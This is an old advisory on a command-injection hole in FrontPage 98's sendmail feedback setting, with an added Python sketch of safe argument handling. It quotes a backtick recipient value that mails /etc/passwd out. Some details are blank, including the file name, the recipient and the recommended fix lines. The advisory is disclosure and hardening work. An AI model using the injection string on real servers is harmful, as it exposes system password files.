

Front Page 98 retrieve arbitrary file by email

    Front Page 98


    *NIX with FP


    Markus Stumpf found the following.  He noticed another weakness,
    which is still present at least in FP98 with the version id:


    Installing a server for FrontPage creates a file (usually)
    /usr/local/frontpage/  In order to get the
    feedback bot working for sending feedback via email, you can define
    within this file:

        SendmailCommand:/usr/sbin/sendmail %r

    The "%r" above is substituted with the recipient's email
    address(es).  With this setting you are vulnerable, as creating a
    feedback page with a recipient address of e.g.

        `/usr/bin/Mail -s 'password' < /etc/passwd`

    will execute the command

        /usr/sbin/sendmail `/usr/bin/Mail -s 'password' < /etc/passwd`

    and send the password file to
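
The substitution described above, as an added example (not from the original advisory or from FrontPage itself): `shell_line` reproduces the plain text substitution of "%r", and `build_argv` shows a hardened alternative that validates each recipient and builds an argument vector that never passes through a shell. The function names, the address allow-list and `webmaster@example.org` are assumptions.

```python
import re
import shlex

# Setting from the advisory; %r stands for the recipient address(es).
SENDMAIL_COMMAND = "/usr/sbin/sendmail %r"

# Assumption: a deliberately narrow allow-list, stricter than RFC 5322.
ADDRESS_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")


def shell_line(template, recipient):
    """Plain text substitution: the string a shell would then interpret."""
    return template.replace("%r", recipient)


def is_safe_recipient(addr):
    """Accept only a bare address that cannot be read as an option."""
    return bool(ADDRESS_RE.fullmatch(addr)) and not addr.startswith("-")


def build_argv(template, recipients):
    """Split the template first, then add each validated address as one argv element."""
    rejected = [r for r in recipients if not is_safe_recipient(r)]
    if rejected or not recipients:
        raise ValueError(f"rejected recipient(s): {rejected!r}")
    argv = []
    for token in shlex.split(template):
        if token == "%r":
            argv.extend(recipients)
        else:
            argv.append(token)
    return argv  # pass to subprocess.run(argv) with the default shell=False


if __name__ == "__main__":
    # Recipient string quoted in the advisory, used here as test input only.
    hostile = "`/usr/bin/Mail -s 'password' < /etc/passwd`"
    print(shell_line(SENDMAIL_COMMAND, hostile))
    try:
        build_argv(SENDMAIL_COMMAND, [hostile])
    except ValueError as exc:
        print("refused:", exc)
    print(build_argv(SENDMAIL_COMMAND, ["webmaster@example.org"]))
```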


    To avoid this, tell FrontPage to use the SMTP protocol to send
    emails by using

    and you may probably also use
